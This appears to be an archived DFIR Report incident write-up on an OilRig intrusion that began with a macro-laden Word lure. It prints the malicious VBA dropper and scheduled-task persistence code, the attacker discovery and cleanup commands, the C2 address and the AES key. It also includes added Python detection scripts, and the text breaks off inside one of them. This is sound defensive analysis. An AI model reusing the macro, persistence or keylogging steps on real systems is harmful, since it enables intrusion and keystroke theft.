{
	"id": "63abef76-a80d-4e96-b178-4496aa54718f",
	"created_at": "2026-04-06T00:19:27.710538Z",
	"updated_at": "2026-04-10T03:37:36.753415Z",
	"deleted_at": null,
	"sha1_hash": "693e7f65b26b8441b3cbf4fa37ecec8a33c2be4a",
	"title": "Collect, Exfiltrate, Sleep, Repeat - The DFIR Report",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2302452,
	"plain_text": "Collect, Exfiltrate, Sleep, Repeat - The DFIR Report\r\nBy editor\r\nPublished: 2023-02-06 · Archived: 2026-04-05 20:17:07 UTC\r\nIn this intrusion from August 2022, we observed a compromise that was initiated with a Word document containing a\r\nmalicious VBA macro, which established persistence and communication to a command and control server (C2). Upon\r\nperforming initial discovery and user enumeration, the threat actor used AutoHotkey to launch a keylogger.\r\nAutoHotkey is an open-source scripting language for Microsoft Windows machines that was introduced to provide easy\r\nkeyboard shortcuts and automation. As described in AutoHotkey documentation, the AHK script can be executed in a\r\nnumber of ways. As observed in this intrusion, the adversary executed the AHK keylogger script by calling a renamed\r\nversion of AutoHotkey.exe (module.exe) and passing the script’s filename (module.ahk) as a command-line parameter.\r\nThe DFIR Report Services\r\nPrivate Threat Briefs: Over 20 private reports annually, such as this one but more concise and quickly published\r\npost-intrusion.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, long-term tracking,\r\ndata clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT\u0026CK with test\r\nexamples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. Interactive labs\r\nare available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.\r\nContact us today for a demo!\r\nCase Summary\r\nThe intrusion began with the execution of a malicious macro within a Word document. The document was themed as a job\r\napplication for the firm Lumen. 
This tactic has been observed by many threat actor groups, including state sponsored actors in North Korea and Iran. Upon opening the file, the user was prompted to enable macros to complete the form, which began execution of the malware.\r\nOnce executed, the macro created a VBS script (Updater.vbs) and two PowerShell scripts (temp.ps1 and Script.ps1), and installed persistence through a scheduled task. The implant was fully implemented in PowerShell, which is uncommon compared to many initial access tools today.\r\nFollowing the execution of the embedded VBA macro, the PowerShell script Script.ps1 began to connect to the C2 server through an encrypted channel. Around a day after execution, the server became live and began sending instructions to the implant. The instructions obtained from the server were then executed through the temp.ps1 PowerShell script.\r\nThe threat actors began executing basic discovery commands, all of which were executed via PowerShell cmdlets or built-in Windows utilities like whoami, net, time, tzutil and tracert; the one exception was when the threat actors extracted a specific function from the PowerSploit framework, Convert-LDAPProperty, to enumerate domain accounts in the environment. All data collected was then exfiltrated over the existing C2 channel.\r\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\r\nPage 1 of 24\n\nOn the fourth day of the intrusion, the threat actors became active again, dropping a set of files that performed keylogger functions. A scheduled task was then created to assist in execution of the keylogger. The keylogger itself was comprised of an executable, module.exe, which was a renamed AutoHotkey binary. This would run the AutoHotkey script module.ahk. Additionally, a PowerShell script called readKey.ps1 would execute in the same task.\r\nOn the sixth day of the intrusion, the threat actors returned and collected the data compiled by the keylogger. This was performed using the makecab.exe Windows utility to compress the keylogger files before exfiltrating them to the C2 server. They then dropped another PowerShell script, which took a screenshot of the desktop of the infected host. After this data was exfiltrated, the threat actors reviewed the antivirus service status and some additional host data.\r\nThe threat actors returned again on the seventh and ninth days to collect the keylogger data. They were not observed performing any further actions before being evicted from the environment.\r\nOne interesting fact about this case is that the initial implant was fully implemented using PowerShell, and no executables were dropped to the victim’s workstation for the implant. It’s also interesting to note that the PowerShell implant was and stayed fully undetected for a significant period of time. This is contrary to many of our reported cases, where the initial access relies on initial access brokers and common malware used by those groups such as Emotet, IcedID, or Qbot.\r\nThe use of custom tailored malware points to a more targeted or discerning organization compared to the spray-and-pray approach performed by many access brokers. Reviewing the network traffic, we observed two signatures fire on the C2 traffic: ET MALWARE TA452 Related Backdoor Activity (GET) and (POST). TA452 is an activity group tracked by Proofpoint that translates to the OilRig group. Under other classifications there is overlap with COBALT GYPSY, IRN2, APT34, and Helix Kitten.\r\nOilRig is suspected of being an Iran based and state sponsored group. This group is widely credited with creating and utilizing various home grown PowerShell frameworks to perform their intrusions. Finally, analyzing the timing of the threat actor’s hands-on-keyboard actions, the threat actors operated between Saturday and Thursday, with no activity on Friday. All activity took place between 0300-1600 UTC, which aligns with 0630-1930 Tehran local time (UTC+3:30). All of these factors together point to the Iranian OilRig group as the likely threat actor behind this intrusion.\r\nTimeline\r\nAnalysis and reporting completed by @MittenSec, @MetallicHack and @0xtornado.\r\nInitial Access\r\nThe initial access used in this intrusion was a malicious Word document dubbed “Apply Form.docm”. This document purported to be an application form for the technology and telecommunications company Lumen.\r\nThis was originally found and shared by @StopMalvertisin in a tweet detailing the lure and the payload. The precise delivery method remains unknown, as we do not have direct evidence on how this malicious document was delivered. We assert with a medium level of confidence, based on previous similar reports, that these documents were likely delivered through spearphishing attachments in emails (T1566).\r\nExecution\r\nThis intrusion began with the execution of a malicious VBA macro embedded in a Word document.\r\nA first look at “Apply Form.docm” with olevba.py immediately highlights some suspicious behaviors.\r\nFirst off, the macro gets the name of the user executing the Word document and creates a directory in AppData if it doesn’t exist:\r\nPrivate Sub Document_Open()\r\n Application.ScreenUpdating = False\r\n Call Macro1\r\n Dim Script, inp As String\r\n inp = Google.meet.Text\r\n pla = Google.chat.Text\r\n uName = Environ(\"username\")\r\n Pathh = \"C:\\Users\\\" \u0026 uName \u0026 \"\\AppData\\Local\\Microsoft\\Windows\\Update\\\"\r\n If Dir(Pathh) = \"\" Then\r\n MkDir Pathh\r\n Call Macro2\r\n End If\r\nThe macro then created two PowerShell scripts and one VBScript file in “C:\\Users\\\u003cUSER\u003e\\AppData\\Local\\Microsoft\\Windows\\Update\\”. Note that the script bodies are not stored in the VBA itself: they are read out of text boxes in the document (Text Box 19 becomes Script.ps1, Text Box 18 becomes temp.ps1), and the VBS launcher is obfuscated with the macro’s own EncodeBase65 routine followed by character substitutions before being written to Updater.vbs:\r\n Set FSO1 = CreateObject(\"Scripting.FileSystemObject\")\r\n SetAttr Pathh, vbHidden\r\n Set FS1 = FSO1.CreateTextFile(Pathh \u0026 \"Script.ps1\", True)\r\n ActiveDocument.Shapes.Range(Array(\"Text Box 19\")).Select\r\n Selection.WholeStory\r\n FS1.WriteLine Selection.Text\r\n FS1.Close\r\n Set FSO3 = CreateObject(\"Scripting.FileSystemObject\")\r\n Set FS3 = FSO3.CreateTextFile(Pathh \u0026 \"temp.ps1\", True)\r\n ActiveDocument.Shapes.Range(Array(\"Text Box 18\")).Select\r\n Selection.WholeStory\r\n FS3.WriteLine Selection.Text\r\n FS3.Close\r\n inp = Replace(inp, \"PATH\", Pathh)\r\n inp = EncodeBase65(inp)\r\n inp = Replace(inp, \"a\", \"@\")\r\n inp = Replace(inp, \"H\", \"-\")\r\n inp = Replace(inp, \"S\", \"$\")\r\n VBS = \"xxx = \"\"\" \u0026 inp \u0026 \"\"\"\" \u0026 vbNewLine \u0026 pla\r\n Set FSO2 = CreateObject(\"Scripting.FileSystemObject\")\r\n Set FS2 = FSO2.CreateTextFile(Pathh \u0026 \"Updater.vbs\", True)\r\n FS2.WriteLine VBS\r\n FS2.Close\r\n PNGenerator\r\n Application.ScreenUpdating = True\r\n ActiveDocument.Shapes.Range(Array(\"Text Box 9\")).Select\r\nEnd Sub\r\nWith Sysmon FileCreate events (Event ID 11), we can see that WINWORD.EXE successfully created these files.\r\nThen, when the document was closed (Document_Close), a scheduled task was registered to execute the script and install persistence:\r\nPrivate Sub Document_Close()\r\n Application.ScreenUpdating = False\r\n uName = Environ(\"username\")\r\n Pathh = \"C:\\Users\\\" \u0026 uName \u0026 \"\\AppData\\Local\\Microsoft\\Windows\\Update\\\"\r\n XML = Google.map.Text\r\n XML = Replace(XML, \"PATH\", Pathh)\r\n Set service = CreateObject(\"Schedule.Service\")\r\n Call service.Connect\r\n Set rootFolder = service.GetFolder(\"\\\")\r\n temp = rootFolder.RegisterTask(\"WindowsUpdate\", XML, 6, , , 3)\r\n Call Macro4\r\nEnd Sub\r\nThe task is registered through the Schedule.Service COM object rather than schtasks.exe, with flags 6 (TASK_CREATE_OR_UPDATE) and logon type 3 (TASK_LOGON_INTERACTIVE_TOKEN). The task definition passed in the XML variable was embedded directly in the document:\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n \u003cRegistrationInfo\u003e\r\n \u003cDescription\u003eThis task is used to start the Windows Update service when needed to perform scheduled operat\r\n \u003cURI\u003e\\WindowsUpdate\u003c/URI\u003e\r\n \u003c/RegistrationInfo\u003e\r\n \u003cTriggers\u003e\r\n \u003cTimeTrigger\u003e\r\n \u003cRepetition\u003e\r\n \u003cInterval\u003ePT10M\u003c/Interval\u003e\r\n \u003cStopAtDurationEnd\u003efalse\u003c/StopAtDurationEnd\u003e\r\n \u003c/Repetition\u003e\r\n \u003cStartBoundary\u003e2022-06-21T00:00:00\u003c/StartBoundary\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cRandomDelay\u003ePT1M\u003c/RandomDelay\u003e\r\n \u003c/TimeTrigger\u003e\r\n \u003cIdleTrigger\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003c/IdleTrigger\u003e\r\n \u003c/Triggers\u003e\r\n \u003cPrincipals\u003e\r\n \u003cPrincipal id=\"Author\"\u003e\r\n \u003cLogonType\u003eInteractiveToken\u003c/LogonType\u003e\r\n \u003cRunLevel\u003eLeastPrivilege\u003c/RunLevel\u003e\r\n \u003c/Principal\u003e\r\n \u003c/Principals\u003e\r\n \u003cSettings\u003e\r\n \u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\r\n \u003cDisallowStartIfOnBatteries\u003efalse\u003c/DisallowStartIfOnBatteries\u003e\r\n \u003cStopIfGoingOnBatteries\u003efalse\u003c/StopIfGoingOnBatteries\u003e\r\n \u003cAllowHardTerminate\u003etrue\u003c/AllowHardTerminate\u003e\r\n \u003cStartWhenAvailable\u003etrue\u003c/StartWhenAvailable\u003e\r\n \u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\r\n \u003cIdleSettings\u003e\r\n \u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n \u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n \u003c/IdleSettings\u003e\r\n \u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cHidden\u003etrue\u003c/Hidden\u003e\r\n \u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\r\n \u003cDisallowStartOnRemoteAppSession\u003efalse\u003c/DisallowStartOnRemoteAppSession\u003e\r\n \u003cUseUnifiedSchedulingEngine\u003etrue\u003c/UseUnifiedSchedulingEngine\u003e\r\n \u003cWakeToRun\u003efalse\u003c/WakeToRun\u003e\r\n \u003cExecutionTimeLimit\u003ePT0S\u003c/ExecutionTimeLimit\u003e\r\n \u003cPriority\u003e7\u003c/Priority\u003e\r\n \u003cRestartOnFailure\u003e\r\n \u003cInterval\u003ePT1M\u003c/Interval\u003e\r\n \u003cCount\u003e3\u003c/Count\u003e\r\n \u003c/RestartOnFailure\u003e\r\n \u003c/Settings\u003e\r\n \u003cActions Context=\"Author\"\u003e\r\n \u003cExec\u003e\r\n \u003cCommand\u003ewscript\u003c/Command\u003e\r\n \u003cArguments\u003e\"PATHUpdater.vbs\"\u003c/Arguments\u003e\r\n \u003c/Exec\u003e\r\n \u003c/Actions\u003e\r\n\u003c/Task\u003e\r\nPersistence\r\nThe first scheduled task, installed by the malicious VBA macro, executed a VBS script, which in turn executed a PowerShell script named Script.ps1. The task is marked Hidden, repeats every ten minutes with up to one minute of random delay, and runs with the user’s interactive token at least privilege, so it survives reboots without needing elevation.\r\nScript.ps1 contacts the C2 server and executes the base64-encoded commands it receives using temp.ps1.\r\nEvent ID 201 from Microsoft-Windows-TaskScheduler/Operational highlights the successful execution of this scheduled task.\r\nAnother scheduled task named MicrosoftEdgeUpdateTaskMachineUC was registered using schtasks.exe on the command line. The scheduled task was then started manually:\r\nC:\\Windows\\system32\\schtasks.exe /run /tn MicrosoftEdgeUpdateTaskMachineUC\r\nThe scheduled task was designed to execute module.exe and a PowerShell script named readKey.ps1.\r\n
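\r\nBoth task definitions in this case can be triaged mechanically. The following Python script is an added example and is not code from The DFIR Report; it parses Task Scheduler XML and flags the traits seen here: a hidden task, a short repetition interval, a script host or an action under a user-writable directory (C:\\Users\\Public, AppData), a PowerShell action with -ep bypass and -windowstyle hidden, a registration author claiming to be Microsoft, and a URI that differs from the name the task was registered under. The two task documents inside the script are constructed from the listings in this report and trimmed to the elements the checks read; the user name victim stands in for the redacted account.\r\n
```python
# Added example (not code from The DFIR Report): triage Windows Task Scheduler
# XML for the traits the two tasks in this case share. The two task documents
# below are constructed from the report's listings and trimmed to the elements
# the checks read; the user name 'victim' stands in for the redacted account.
import re
import xml.etree.ElementTree as ET

TASK_NS = 'http://schemas.microsoft.com/windows/2004/02/mit/task'
NS = {'t': TASK_NS}
BS = chr(92)   # backslash, kept out of the literals so the XML stays readable
DQ = chr(34)   # double quote

# Directories any user can write to: an action living there is suspect no
# matter what RegistrationInfo claims. Script hosts turn a text file into code.
USER_WRITABLE = ('/users/public/', '/appdata/', '/temp/', '/programdata/')
SCRIPT_HOSTS = ('wscript', 'cscript', 'powershell', 'pwsh', 'mshta',
                'rundll32', 'regsvr32')

UPDATER_VBS = BS.join(('C:', 'Users', 'victim', 'AppData', 'Local', 'Microsoft',
                       'Windows', 'Update', 'Updater.vbs'))
MODULE_EXE = BS.join(('C:', 'Users', 'Public', 'module', 'module.exe'))
MODULE_AHK = BS.join(('C:', 'Users', 'Public', 'module', 'module.ahk'))
READKEY_PS1 = BS.join(('C:', 'Users', 'Public', 'module', 'readKey.ps1'))

# Task 1: registered by the macro as WindowsUpdate (XML declaration omitted).
TASK_WINDOWSUPDATE = f'''<Task version='1.3' xmlns='{TASK_NS}'>
 <RegistrationInfo>
  <Description>This task is used to start the Windows Update service when needed</Description>
  <URI>{BS}WindowsUpdate</URI>
 </RegistrationInfo>
 <Triggers><TimeTrigger><Repetition><Interval>PT10M</Interval></Repetition>
  <Enabled>true</Enabled><RandomDelay>PT1M</RandomDelay></TimeTrigger></Triggers>
 <Settings><Hidden>true</Hidden></Settings>
 <Actions Context='Author'><Exec><Command>wscript</Command>
  <Arguments>&quot;{UPDATER_VBS}&quot;</Arguments></Exec></Actions>
</Task>'''

# Task 2: imported from t.xml and registered as MicrosoftEdgeUpdateTaskMachineUC.
TASK_KEYLOGGER = f'''<Task version='1.2' xmlns='{TASK_NS}'>
 <RegistrationInfo><Author>Microsoft Inc.</Author><URI>{BS}masdfm</URI></RegistrationInfo>
 <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
 <Settings><Hidden>false</Hidden></Settings>
 <Actions Context='Author'>
  <Exec><Command>&quot;{MODULE_EXE}&quot;</Command><Arguments>&quot;{MODULE_AHK}&quot;</Arguments></Exec>
  <Exec><Command>powershell</Command>
   <Arguments>-ep bypass -windowstyle hidden -f &quot;{READKEY_PS1}&quot;</Arguments></Exec>
 </Actions>
</Task>'''


def _text(node, path):
    found = node.find(path, NS)
    return (found.text or '').strip() if found is not None else ''


def _norm(value):
    # Quote-free, lower-case, forward-slash form for location matching.
    return value.replace(DQ, '').replace(BS, '/').lower()


def iso_duration_minutes(duration):
    # Parse the PnDTnHnMnS durations Task Scheduler emits (PT10M, PT72H, ...).
    m = re.fullmatch('P(?:([0-9]+)D)?(?:T(?:([0-9]+)H)?(?:([0-9]+)M)?(?:([0-9]+)S)?)?', duration)
    if not m:
        return None
    days, hours, minutes, seconds = (int(g) if g else 0 for g in m.groups())
    return days * 1440 + hours * 60 + minutes + seconds / 60


def triage_task(xml_text, registered_name=None):
    # Return the list of findings for one task definition.
    task = ET.fromstring(xml_text)
    findings = []
    if _text(task, 't:Settings/t:Hidden').lower() == 'true':
        findings.append('hidden task')
    interval = _text(task, 't:Triggers/t:TimeTrigger/t:Repetition/t:Interval')
    minutes = iso_duration_minutes(interval) if interval else None
    if minutes is not None and 0 < minutes <= 15:
        findings.append(f'beacon-like repetition every {interval}')
    uri = _text(task, 't:RegistrationInfo/t:URI').lstrip(BS)
    if registered_name and uri and uri.lower() != registered_name.lower():
        findings.append(f'URI {uri} does not match registered name {registered_name}')
    in_user_writable = False
    for action in task.findall('t:Actions/t:Exec', NS):
        cmd = _norm(_text(action, 't:Command'))
        args = _norm(_text(action, 't:Arguments'))
        if any(d in cmd + ' ' + args for d in USER_WRITABLE):
            in_user_writable = True
            findings.append(f'action in user-writable path: {cmd} {args}'.strip())
        host = cmd.rsplit('/', 1)[-1].removesuffix('.exe')
        if host in SCRIPT_HOSTS:
            findings.append(f'script host {host} used as task action')
        if host in ('powershell', 'pwsh') and ('-ep bypass' in args or '-windowstyle hidden' in args):
            findings.append('powershell with execution policy bypass / hidden window')
    author = _text(task, 't:RegistrationInfo/t:Author')
    if in_user_writable and author.lower().startswith('microsoft'):
        findings.append(f'author claims {author} but action runs from a user-writable path')
    return findings


if __name__ == '__main__':
    for name, xml_text in (('WindowsUpdate', TASK_WINDOWSUPDATE),
                           ('MicrosoftEdgeUpdateTaskMachineUC', TASK_KEYLOGGER)):
        print(name)
        for finding in triage_task(xml_text, name):
            print('  -', finding)
```
\r\nThe URI check exists because schtasks /create /xml registers the task under the /tn name and the URI inside the imported file does not have to agree with it, which is why t.xml can carry masdfm while the task shows up as MicrosoftEdgeUpdateTaskMachineUC. The Hidden and interval checks fire on the macro-registered WindowsUpdate task even though its action is the legitimate wscript host; the location and author checks fire on the keylogger task even though it is not hidden. Run over exported task XML (schtasks /query /xml) the same checks work unchanged.\r\n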
These components will be explained later in the Collection section of this report.\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n \u003cRegistrationInfo\u003e\r\n \u003cDate\u003e2022-08-04T11:52:03.8083191\u003c/Date\u003e\r\n \u003cAuthor\u003eMicrosoft Inc.\u003c/Author\u003e\r\n \u003cURI\u003e\\masdfm\u003c/URI\u003e\r\n \u003c/RegistrationInfo\u003e\r\n \u003cTriggers\u003e\r\n \u003cLogonTrigger\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cUserId\u003e[REDACTED]\u003c/UserId\u003e\r\n \u003c/LogonTrigger\u003e\r\n \u003c/Triggers\u003e\r\n \u003cPrincipals\u003e\r\n \u003cPrincipal id=\"Author\"\u003e\r\n \u003cUserId\u003e[REDACTED]\u003c/UserId\u003e\r\n \u003cLogonType\u003eInteractiveToken\u003c/LogonType\u003e\r\n \u003cRunLevel\u003eLeastPrivilege\u003c/RunLevel\u003e\r\n \u003c/Principal\u003e\r\n \u003c/Principals\u003e\r\n \u003cSettings\u003e\r\n \u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\r\n \u003cDisallowStartIfOnBatteries\u003etrue\u003c/DisallowStartIfOnBatteries\u003e\r\n \u003cStopIfGoingOnBatteries\u003etrue\u003c/StopIfGoingOnBatteries\u003e\r\n \u003cAllowHardTerminate\u003etrue\u003c/AllowHardTerminate\u003e\r\n \u003cStartWhenAvailable\u003efalse\u003c/StartWhenAvailable\u003e\r\n \u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\r\n \u003cIdleSettings\u003e\r\n \u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n \u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n \u003c/IdleSettings\u003e\r\n \u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cHidden\u003efalse\u003c/Hidden\u003e\r\n \u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\r\n \u003cWakeToRun\u003efalse\u003c/WakeToRun\u003e\r\n \u003cExecutionTimeLimit\u003ePT72H\u003c/ExecutionTimeLimit\u003e\r\n \u003cPriority\u003e7\u003c/Priority\u003e\r\n \u003c/Settings\u003e\r\n \u003cActions Context=\"Author\"\u003e\r\n \u003cExec\u003e\r\n \u003cCommand\u003e\"C:\\Users\\Public\\module\\module.exe\"\u003c/Command\u003e\r\n \u003cArguments\u003e\"C:\\Users\\Public\\module\\module.ahk\"\u003c/Arguments\u003e\r\n \u003c/Exec\u003e\r\n \u003cExec\u003e\r\n \u003cCommand\u003epowershell\u003c/Command\u003e\r\n \u003cArguments\u003e-ep bypass -windowstyle hidden -f \"C:\\Users\\Public\\module\\readKey.ps1\"\u003c/Arguments\u003e\r\n \u003c/Exec\u003e\r\n \u003c/Actions\u003e\r\n\u003c/Task\u003e\r\nDefense Evasion\r\nThe keylogger used in the intrusion XOR-encoded the captured keystroke data before writing it to logFileuyovaqv.bin.\r\nThe threat actors also removed files created by their discovery and collection actions during the intrusion:\r\nRemove-Item \"C:\\Users\\REDACTED\\AppData\\Local\\Temp\\logFileuyovaqv.cab\"\r\nRemove-Item c:\\users\\public\\u.zip\r\nRemove-Item c:\\users\\public\\u.xml\r\nDiscovery\r\nMultiple discovery commands were executed by the threat actors. Each command was executed via the temp.ps1 script, with the input commands passed as base64-encoded command-line arguments.\r\nDuring the intrusion, the threat actors executed the following discovery tasks.\r\nList disk information\r\n\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" logicaldisk\r\nList processes\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -command Get-Process\r\nGet information about the Windows Defender service\r\n\"C:\\Windows\\system32\\cmd.exe\" /c sc query WinDefend\r\nGet the current time on the victim’s workstation\r\n\"C:\\Windows\\system32\\cmd.exe\" /c time\r\nGet the time zone\r\n\"C:\\Windows\\system32\\cmd.exe\" /c tzutil /g\r\nUse tracert to discover the network path to the internet (8.8.8.8)\r\n\"C:\\Windows\\system32\\cmd.exe\" /c tracert 8.8.8.8\r\nDisplay the local account policy (password and lockout settings; net accounts does not list accounts)\r\n\"C:\\Windows\\system32\\net.exe\" accounts\r\nGet information on the current user, including groups and privileges\r\n\"C:\\Windows\\system32\\whoami.exe\" /all\r\nEnumerate files\r\nget-childitem \"C:\\Program Files\" | out-string\r\nget-childitem \"C:\\Program Files (x86)\" | out-string\r\nget-childitem \"C:\\users\" | out-string\r\nGet-ChildItem \"C:\\users\\$env:username\\desktop\\\" | out-string\r\nGet-ChildItem \"C:\\users\\$env:username\\downloads\\\" | out-string\r\nGet-ChildItem \"C:\\users\\$env:username\\documents\\\" | out-string\r\nGet-ChildItem $env:LOCALAPPDATA | out-string\r\nget-childitem \"C:\\Program Files\" | out-string\r\nget-childitem C:\\ | out-string\r\nget-childitem C:\\users\\%username%\\downloads | out-string\r\nget-childitem C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default | out-string\r\nget-childitem C:\\Users\\$env:username\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default | out-string\r\nA PowerShell function based on the PowerSploit Convert-LDAPProperty code was used to retrieve information on domain accounts. The query below uses a DirectorySearcher with an objectclass=computer filter, so what it returns is the sAMAccountName and operating system of every computer account in the domain:\r\nQuery AD for computer accounts (sAMAccountName and operating system)\r\n$s = new-object -typename system.directoryservices.directorysearcher\r\n$s.PageSize = 999999999\r\n$s.Filter = '(\u0026(objectclass=computer))'\r\n$s.findall() | % {$_.properties.samaccountname; $_.properties.operatingsystem}\r\nComputer and network information discovery\r\nGet-ComputerInfo | out-string\r\nGet-NetTCPConnection | out-string\r\nGet-NetIPConfiguration -All | Out-String\r\nGet the account name of the logged-on user of a Windows machine\r\nGet-WmiObject -ComputerName [REDACTED] -Class Win32_ComputerSystem | Select-Object UserName\r\nGet the status of antimalware software on the computer\r\nGet-MpComputerStatus\r\nList the contents of the user’s temp directory\r\nls $env:temp\r\nget-childitem $env:temp | out-string\r\nGet the public IP address\r\nInvoke-WebRequest -UseBasicParsing -Uri http://ident.me | out-string\r\nCollection\r\nBefore exfiltration, the data collected from LDAP discovery was written out to an XML file and compressed:\r\nCompress-Archive -Path c:\\users\\public\\u.xml -DestinationPath c:\\users\\public\\u.zip -CompressionLevel Optimal\r\nThe threat actors also dropped and executed a PowerShell script, sc.ps1, using their temp.ps1 C2 script. The sc.ps1 file contained PowerShell code to capture a screenshot of the system. The screenshots were taken upon execution of this script and saved in the same directory as sc.png.\r\nA scheduled task named MicrosoftEdgeUpdateTaskMachineUC was created by the threat actors. The program executed by this task was a keylogger, which relied on the files module.exe, module.ahk, and readkey.ps1. The file t.xml contained the task definition used to execute these files.\r\nThe executable, module.exe, is a renamed binary of AutoHotkey. This is one of the ways in which you can execute an AutoHotkey (AHK) script; because the binary is unmodified, its PE OriginalFileName still reads AutoHotkey.exe, which is what the renamed-binary Sigma rule in the Detections section keys on.\r\nThe actual keylogger is the AHK script, module.ahk.\r\nNavigating through the AHK script, we discovered artifacts of acquiring the keyboard layout and capturing pressed keys. In addition, we noticed a function named UpdateReg that accepts a text parameter. The registry key it writes is also referenced in the readkey.ps1 script and turns out to be where the keylogger saved captured keystrokes.\r\nThe readkey.ps1 file grabbed the keystrokes from the KeypressValue registry key, XORed the data, and saved it to a log file (logFileuyovaqv.bin).\r\nThe threat actors then made a cab file out of the collected keystrokes in preparation for exfiltration:\r\nmakecab \"C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\logFileuyovaqv.bin\" C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Temp\\log\r\nCommand and Control\r\nActivity to the C2 is established via execution of the Script.ps1 and temp.ps1 files. Communication between the victim and C2 is encrypted using AES-CBC (the 32-byte key below makes this AES-256) with the following hard-coded key and IV, which means a defender with these values can decrypt captured traffic offline:\r\nKey 17 1d 84 e8 41 ae e4 c0 ff fb a2 7c 86 d1 ec 82 b8 80 7c b8 c3 79 9a 11 b8 fa 2d b7 78 1f d1 5a\r\nIV 18 3c ed 6f b3 34 9f 9a c6 f9 08 f9 29 de 35 52\r\nFirst communication to the C2 (hxxp[:]//45[.]89[.]125[.]189/get) began on day one and beaconed in roughly 10-minute increments, matching the PT10M repetition interval of the WindowsUpdate task.\r\n
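\r\nThe cadence is itself a detection opportunity, with one caveat: for the whole first day the server answered every beacon with a 502, so a pipeline that drops 5xx responses as noise would have discarded the earliest evidence. The following Python script is an added example, not code from The DFIR Report or from the threat actor; it groups proxy-style request records by source, method and URL, scores the regularity of their inter-arrival times, and reports when each group was first seen. The records it runs on are constructed to mirror the behaviour described above (a GET to /get every ten minutes plus up to sixty seconds of random delay, 502 until day two, then a POST to /put); the victim address 10.0.0.15, the start time and the random seed are placeholders, not values from the case.\r\n
```python
# Added example (not code from The DFIR Report or the threat actor): flag
# fixed-interval beaconing in proxy-style request records and show how a
# filter that drops 5xx responses delays first detection by a day.
# Records are constructed; 10.0.0.15, START and the seed are placeholders.
from collections import defaultdict
from datetime import datetime, timedelta
from random import Random
from statistics import median

C2 = '45.89.125.189'
SRC = '10.0.0.15'                        # placeholder victim address
START = datetime(2022, 8, 1, 3, 0, 0)    # placeholder first-beacon time (UTC)


def constructed_records():
    # (timestamp, source, method, url, status) tuples. Day 1: GET /get every
    # 600 s plus 0-60 s RandomDelay (as in the task XML), all answered 502.
    # Day 2: same cadence answered 200, then one POST /put. A few unrelated
    # requests are mixed in to show that they are not flagged.
    rng = Random(17333)
    recs = []
    for i in range(150):   # 25 hours of beacons
        ts = START + timedelta(seconds=600 * i + rng.randint(0, 60))
        status = 502 if ts < START + timedelta(days=1) else 200
        recs.append((ts, SRC, 'GET', f'http://{C2}/get', status))
    recs.append((START + timedelta(days=1, hours=1), SRC, 'POST', f'http://{C2}/put', 200))
    for _ in range(8):
        ts = START + timedelta(minutes=rng.randint(0, 1400))
        recs.append((ts, SRC, 'GET', 'http://intranet.example/index.html', 200))
    return sorted(recs)


def beacon_candidates(records, min_hits=6, tolerance_s=90, min_regular=0.8,
                      ignore_server_errors=False):
    # Group requests by (source, method, url); a group is a candidate when it
    # has at least min_hits requests and at least min_regular of the gaps
    # between consecutive requests lie within tolerance_s of the median gap.
    # ignore_server_errors=True imitates a pipeline that discards 5xx rows.
    groups = defaultdict(list)
    for ts, src, method, url, status in records:
        if ignore_server_errors and 500 <= status < 600:
            continue
        groups[(src, method, url)].append((ts, status))
    found = []
    for key, hits in groups.items():
        if len(hits) < min_hits:
            continue
        times = sorted(t for t, _ in hits)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mid = median(gaps)
        regular = sum(abs(g - mid) <= tolerance_s for g in gaps) / len(gaps)
        if regular >= min_regular:
            found.append({'key': key, 'hits': len(hits), 'period_s': mid,
                          'regular': round(regular, 2),
                          'statuses': sorted({s for _, s in hits}),
                          'first_seen': times[0]})
    return found


if __name__ == '__main__':
    recs = constructed_records()
    for label, flag in (('all responses kept', False), ('5xx dropped', True)):
        print(label)
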